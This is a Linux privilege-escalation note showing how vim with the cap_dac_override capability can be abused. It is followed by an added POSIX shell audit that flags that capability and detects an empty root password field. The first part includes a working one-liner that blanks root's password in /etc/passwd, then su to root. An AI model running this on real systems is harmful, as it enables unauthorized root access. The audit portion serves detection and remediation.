To find all files with capabilities set:
getcap -r / 2>/dev/null
To run getcap on each file in the common binary directories instead:
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
To exploit cap_dac_override:
For example if it is vim:
getcap /usr/bin/vim.basic
/usr/bin/vim.basic cap_dac_override=eip
Because the binary has the cap_dac_override capability set, it bypasses discretionary access control (file read/write/execute permission checks), so it can escalate the privileges of the user who runs it.
A system file can be modified with this capability. Clearing the root user's password field in /etc/passwd
allows login as root without a password.
Non-interactive method:
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd
Then use su
to get root access.
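Added defensive example (not part of the original note): a small POSIX sh audit that flags binaries whose getcap output contains cap_dac_override, and a check that detects the post-exploitation artifact the note describes, a root entry in a passwd-format file with an empty password field. The getcap output lines and the passwd sample are constructed; function names (flag_dac_override, root_password_field_empty) are assumptions.

```shell
#!/bin/sh
# Added example, not from the original note. Audits capability output for
# cap_dac_override and checks a passwd-format file for an empty root
# password field. All sample data below is constructed.

# Constructed sample of `getcap -r / 2>/dev/null` output (new-style format).
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/vim.basic cap_dac_override=eip
/usr/sbin/arping cap_net_raw=ep'

# Read getcap lines ("<path> <capset>") from stdin and print the path of
# every binary whose capability set contains cap_dac_override. Older getcap
# prints "<path> = cap_...+eip"; the path is still the first field, so the
# substring match works for both formats.
flag_dac_override() {
    while read -r path caps; do
        case "$caps" in
            *cap_dac_override*) printf '%s\n' "$path" ;;
        esac
    done
}

# Return 0 if the root entry in the passwd-format file $1 has an empty
# password field (what the substitution in the note produces), else 1.
root_password_field_empty() {
    awk -F: '$1 == "root" && $2 == "" { found = 1 } END { exit found ? 0 : 1 }' "$1"
}

# Demo on the constructed data.
echo "Binaries with cap_dac_override:"
printf '%s\n' "$SAMPLE_GETCAP" | flag_dac_override

# Constructed passwd sample written to a temp file so the check runs offline.
SAMPLE_PASSWD=$(mktemp)
printf 'root::0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n' > "$SAMPLE_PASSWD"
if root_password_field_empty "$SAMPLE_PASSWD"; then
    echo "ALERT: root has an empty password field in $SAMPLE_PASSWD"
else
    echo "root password field is set in $SAMPLE_PASSWD"
fi
rm -f "$SAMPLE_PASSWD"
```

On a live host, feed `getcap -r / 2>/dev/null | flag_dac_override` and run `root_password_field_empty /etc/passwd` from a cron job or an integrity-monitoring hook. Remediation for an unexpected hit is to remove the capability with `setcap -r <path>` and restore the root entry from a known-good copy of /etc/passwd.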